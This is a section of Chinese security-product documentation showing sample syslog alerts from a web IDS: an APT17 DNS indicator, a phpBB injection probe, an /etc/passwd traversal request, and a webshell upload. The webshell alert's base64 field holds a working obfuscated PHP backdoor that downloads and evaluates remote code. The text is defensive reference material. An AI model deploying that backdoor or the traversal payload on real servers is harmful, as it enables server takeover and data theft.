1.3.3 范例
webids-ioc_dolog范例
发送syslog的格式为 : (facility = local3,日志级别为:warning)
发送时间 客户端IP 日志类型 日志
2019-08-15 17:50:47|!10.91.4.198|!webids-ioc_dolog|!{"rule_desc": "APT17 APT组织活动事件", "campaign": "APT17", "@timestamp": "2019-08-15T17:00:07.946+0800", "packet_data": "AJALLmC1AFBWogIqCABFAABAh5tAAEARxOUKBQAd3wUFBaEjADUALHr7l9Q BAAABAAAAAAAAA2FsaQpibGFua2NoYWlyA2NvbQAAAQAB", "dns_arecord": "", "tproto": "udp", "host_reraw": "com.blankchair.ali", "sport": 41251, "host_raw": "ali.blankchair.com", "attack_ip": "", "ioc_type": "host", "etime": "2017-03-08 13:33:11", "attack_type": "APT事件", "sip": "10.5.0.29","severity": 9, "proto": "dns", "kill_chain_all": "命令控制:0x03000000|命令 控制服务器连接:0x030a0000", "filename": "", "serial_num": "QbJK/cNEg", "dns_type": 0, "rule_state": "green", "tid": 1, "attack_type_all": "APT事件:10000000|APT事件:10010000", "type": "KNOWN APT", "uri_md5": "d41d8cd98f00b204e9800998ecf8427e", "targeted": true, "access_time": 1565859693000, "nid": "1161928703861588190","file_md5": "", "kill_chain": "c2", "offence_value": "10.5.0.29", "host": "ali.blankchair.com", "victim_ip": "10.5.0.29", "malicious_family": "Unknown", "geo_dip": {"subdivision": "Zhejiang Sheng", "country_code2": "CN", "longitude": "120.1614", "latitude": "30.2936", "continent_code": "AS", "city_name": "Hangzhou"}, "desc": "APT 17活动详情\n\nAPT 17是在2015年8月被FireEye公开揭露出来的一个 APT组织,最早的活动可以追溯到2013年。相关行动的主要细节如下:\n\n使用的攻击方式:水坑\n涉及行业:日本软件公司\n受影响国家:日本\n相关 技术:\n\t\t\t1、使用的远控木马为:BLACKCOFFEE, WEBCnC, Joy RAT, PlugX。\n\t\t\t 2、该组织通过窃取日本软件公司的证书然后给恶意软件签名,诱使目标下载安装BLACKOFFICE后门。\n\t\t\t 3、其他别名:Deputy Dog、Aurora Panda。\n\t\t\t\n\t\t\t\n 参考链接:\n\t\t http://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html\n\t\t http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html\n", "xml_confidence": "high", "offence_type": "sip", "host_md5": "97419d43006658e6d6f3a6446ee83fa2", "@version": "6", "uri": "", "current_status": "inactive", "ioc_source": 0, "ioc_value": "ali.blankchair.com", "dport": 53, "dip": "223.5.5.5", "malicious_type": "APT事件"}
webids-ids_dolog范例
发送syslog的格式为 : (facility = local3,日志级别为:warning)
发送时间 客户端IP 日志类型 日志
2019-08-15 17:50:45|!10.91.4.198|!webids-ids_dolog|!{"intranet_rule_all": null, "ids_rule_version": "1.0", "cnnvd_id": "", "description": "1", "appid": 77, "packet_data": "UFeo1Lt/AAwphPOJCABFAAE7ewtAAEAGqGEKEwEVChMBFptiA FCb/E2ZyqJLgVAYAC4O7QAAR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU 3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JT U0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJ TI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50 OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS41KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAx Mzg5KQ0KSG9zdDogd3d3LjM2MC5jbg0KDQo=", "xff": null, "kill_chain": "0x02010000", "rule_name": "phpBB Viewtopic.PHP PHP Highlight Script Injection Vulnerability", "webrules_tag": "1", "attack_result": "0", "victim": "10.19.1.22", "dport": 80, "bulletin": "", "sport": 39778, "affected_system": "", "attack_type": "代码执行", "confidence": 50, "sip": "10.19.1.21", "severity": 6, "protocol_id": 6, "attack_method": "", "attack_flag": "true", "kill_chain_all": "入侵:0x02000000|漏洞探测:0x02010000", "detail_info": "phpBB 2.x versions prior to version 2.0.11 are prone to a script injection vulnerability while parsing certain crafted HTTP requests. The vulnerability is due to the lack of proper checks on highlights in the HTTP request, allowing for a remote code execution. An attacker could exploit the vulnerability by sending a crafted HTTP request. A successful attack could lead to a remote code execution with the privileges of the server.\n\n
Reference:http://marc.theaimsgroup.com/?l=bugtraq&m=110029415208724&w=2, http://marc.theaimsgroup.com/?t=110079440800004&r=1&w=2,http://marc.theaimsgroup.com/?l=bugtraq&m=110365752909029&w=2, http://marc.theaimsgroup.com/?l=bugtraq&m=110143995118428&w=2,http://www.us-cert.gov/cas/techalerts/TA04-356A.html, http://www.kb.cert.org/vuls/id/497400,http://secunia.com/advisories/13239/,http://xforce.iss.net/xforce/xfdb/18052", "attacker": "10.19.1.21", "packet_size": 329, "info_id": "9506", "attack_type_all": "攻击利用:16000000|代码执行:16030000", "serial_num": "QbJK/cNEg", "sig_id": 33590712, "write_date": 1565857707, "victim_type": "server", "vuln_type": "代码执行", "dip": "10.19.1.22", "rule_id": 2414}
webids-webattack_dolog范例
发送syslog的格式为 : (facility = local3,日志级别为:warning)
发送时间 客户端IP 日志类型 日志
2019-08-15 17:50:45|!10.91.4.198|!webids-webattack_dolog|!{"webrules_tag": "1", "referer": " http://www.baidu.com:80/", "file_name": "", "@timestamp": "2019-08-15T16:33:07.619+0800", "agent": "", "solution": "对此类敏感请求进行拦截。", "host_reraw": "com.baidu.www", "attack_result": "0", "victim": "10.19.1.23", "sport": 57400, "attack_type": "默认配置不当", "rsp_status": 0, "sip": "10.19.1.22", "severity": 6, "rsp_body_len": 0, "public_date": "2018-08-30 16:27:11", "kill_chain_all": "侦察:0x01000000|信息泄露:0x01020000", "detail_info": "发现在HTTP请求中发现试图访问Linux下敏感文件的疑似攻击行为。", "serial_num": "QbJK/cNEg", "rsp_content_type": "", "vuln_name": "发现尝试请求Linux下敏感文件", "vuln_harm": "此类请求行为一旦成功, 攻击者可通过访问敏感信息实施进一步的攻击。", "parameter": "cl=../../../../../../../../../../etc/passwd&rn=20&rtt=2&tn=baiduwb&wd=win8.1", "method": "GET", "req_body": "", "uri_md5": "3167e39c45796fff2ec661320c219333", "req_header": "GET /s?cl=../../../../../../../../../../etc/passwd&rn=20&rtt=2&tn=baiduwb&wd=win8.1 HTTP/1.1\r\n Referer: http://www.baidu.com:80/\r\nCookie: BAIDUID=C97B192DE3AF2C166FC837A952E1FB47:FG=1; BDSVRTM=9; H_PS_PSSID=4392_1427_4261_4897_4760_4677; BD_CK_SAM=1; BDRCVFR[yddw7FPe_pC]=I67x6TjHwwYf0; BDSFRCVID=vFAsJeCCxG0PZ3nCzm2M8f3dpNmwn80nQT0m3J; H_BDCLCKID_SF=tRk8oItMJCvqKRopMtOhq4tehH4qQhReWDTm5-nTtUJAhnrJ24 FKqqkl-to80-rfaJ-jWfjmtnC5OCFljTu2D5O0eU_X5to05TIX3b7Ef-QPEtO_bfbT2MbQ0bCe2fJEaRruVnLb5PJFDt3ke53_0q3QhHbZqtJHKbDtoD-KJfK; NOJS=1\r\nHost: www.baidu.com\r\nConnection: Keep-alive\r\nAccept-Encoding: gzip,deflate\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36\r\nAccept: */*\r\n\r\n", "confidence": 50, "kill_chain": "0x01020000", "rule_name": "发现尝试请求Linux下敏感文件", "host": "www.baidu.com", "cookie": " BAIDUID=C97B192DE3AF2C166FC837A952E1FB47:FG=1; BDSVRTM=9; H_PS_PSSID=4392_1427_4261_4897_4760_4677; BD_CK_SAM=1; BDRCVFR[yddw7FPe_pC]=I67x6TjHwwYf0; BDSFRCVID=vFAsJeCCxG0PZ3nCzm2M8f3dpNmwn80nQT0m3J; H_BDCLCKID_SF=tRk8oItMJCvqKRopMtOhq4tehH4qQhReWDTm5-nTtUJAhnrJ24FKqqkl-to80-rfaJ-jWfjmtnC5OCFljTu2D5O0eU_X5to05TIX3b7Ef-QPEtO_bfbT2MbQ0bCe2fJEaRruVnLb5PJFDt3ke53_0q3QhHbZqtJHKbDtoD-KJfK; NOJS=1", "@version": "6", "write_date": 1565858082, "code_language": "其他", "site_app": "其他", "host_md5": "dab19e82e1f9a681ee73346d3e7a575e", "attacker": "10.19.1.22", "victim_type": "server", "attack_flag": "true", "uri": "/s?cl=../../../../../../../../../../etc/passwd&rn=20&rtt=2&tn=baiduwb&wd=win8.1", "rsp_content_length": 0, "vuln_desc": "发现在 HTTP请求中发现试图访问Linux下敏感文件的疑似攻击行为。", "rule_version": 1, "attack_type_all": "攻击利用:16000000|配置不当/错误:160C0000", "rsp_body": "", "rsp_header": "", "dport": 80, "dolog_count": 1, "vuln_type": "默认配置不当", "dip": "10.19.1.23", "rule_id": 268567921, "host_raw": "www.baidu.com"}
webids-webshell_dolog范例
发送syslog的格式为 : (facility = local3,日志级别为:warning)
发送时间 客户端IP 日志类型 日志
2019-08-15 17:50:46|!10.91.4.198|!webids-webshell_dolog|!{"file": "PD9waHANCmVycm9yX3JlcG9ydGluZygwKTsNCnNlc3Npb25fc3RhcnQoKTsNCmhlYWRlcigiQ29 udGVudC10eXBlOnRleHQvaHRtbDtjaGFyc2V0PWdiayIpOw0KJHBhc3N3b3JkID0gInB1an llaDRpZmxpdWV2bSI7IA0KaWYoZW1wdHkoJF9TRVNTSU9OWydhcGkxMjM0J10pKSANCgkkX1 NFU1NJT05bJ2FwaTEyMzQnXT1maWxlX2dldF9jb250ZW50cyhzcHJpbnRmKCclcz8lcycscGF jaygiSCoiLCc2ODc0NzQ3MDNBMkYyRjMxMzIzMzJFMzEzMjM1MkUzMTMxMzQyRTM4MzIyRjZBN zg2NjYyNzU2MzZCNjU3NDMyMzAzMTM0MzEyRjY4NjE2MzZCMkYzMTJFNkE3MDY3JyksdW5pcWlkK CkpKTsNCmlmKHN0cmlwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCdiYWlkdScpKzA9 PTApIGV4aXQ7DQppZihzdHJpcG9zKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSwnbXljY 3MnKSswPT0wKSBleGl0OwkNCigkYjRkYm95ID0gZ3p1bmNvbXByZXNzKCRfU0VTU0lPTlsnYXBpM TIzNCddKSkgJiYgQHByZWdfcmVwbGFjZSgnL2FkL2UnLCdAJy5zdHJfcm90MTMoJ3JpbnknKS4nKC RiNGRib3kpJywgJ2FkZCcpOw0KPz4=", "@timestamp": "2019-08-15T16:28:14.421+0800", "host_reraw": "171:8081.66.16.10","attack_result": "0", "victim": "10.16.66.171", "sport": 45299, "attack_type": "加密后门", "confidence": 80, "sip": "192.168.61.133", "severity": 8, "file_dir": "upload", "kill_chain_all": "入侵:0x02000000|漏洞探测:0x02010000", "detail_info": "攻击者企图上传一个后门文件。后门程序一般是指那些绕过安全性控制而获取对程序或 系统访问权的程序。该后门文件在调用>某些PHP函数后会输出一段代码,该代码中含有一些高度危险的函数, 比如base64_decode/create_function/chr等,具有后门的显著特征,可实现对服务器的操作和控制。", "serial_num": "QbJK/cNEg", "attack_harm": "服务器被植入后门程序后可能导致以下后果: 1.整个网站或者服务器被黑客控制,变成傀儡主机;2.核心数据被窃取,造成用户信息泄露。", "file_md5": "55c1a4fee7821c8689dc4fd895f593ed", "kill_chain": "0x02010000", "attacker": "192.168.61.133", "host": "10.16.66.171:8081", "@version": "6", "write_date": 1565857831, "attack_desc": "攻击者企图上传一个后门文件。后门程序一般是指那些绕过>安全性控制而获取对程序或系统访问权的程序。 该后门文件在调用某些PHP函数后会输出一段代码,该代码中含有一些高度危险的函数,比如base64_decode/create_function/chr等, 具有后门的显著特征,可实现对>服务器的操作和控制。", "host_md5": "28713b58235ab268378f0af86cecaa64", "rule_name": "加密后门.B", "url": "/upload/upload.php", "dip": "10.16.66.171", "attack_flag": "true", "webrules_tag": "1", "attack_type_all": "攻击利用:16000000|webshell上传:161C0000", "dport": 8081, "victim_type": "server", "rule_id": 10027, "host_raw": "10.16.66.171:8081"}
